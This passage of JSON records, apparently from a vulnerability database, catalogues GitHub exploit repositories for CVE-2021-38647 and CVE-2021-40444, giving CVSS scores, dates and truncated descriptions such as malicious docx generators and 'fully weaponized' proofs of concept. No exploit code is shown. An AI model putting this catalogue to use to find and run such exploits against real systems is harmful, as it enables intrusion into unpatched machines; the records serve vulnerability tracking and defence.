"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-20T16:29:48", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-09T18:59:00", "id": "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:58", "description": "# CVE-2021-38647 AKA \"OMIGOD\"\nA Zeek package which detects CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T04:51:02", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2023-09-16T21:47:30", "id": "8217668C-9748-5511-8C01-7E933D69F872", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:00", "description": "# CVE-2021-38647\n\n\nThis is a POC for CVE-2021-38647 :\n\nSend a PO...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T21:44:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-19T05:39:40", "id": "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:26", "description": "# cve-2021-38647\nhttps://github.com/corelight/CVE-2021-38647 wit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T15:20:40", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-22T15:29:15", "id": "610ADCD3-C281-52D4-A546-467569FE3AC1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:55", "description": "# Readme\n\nAn educational lab VM to learn about the 9.6 CVSS unau...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T15:25:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-27T11:34:25", "id": "09412330-832C-538A-A226-61474048E41B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 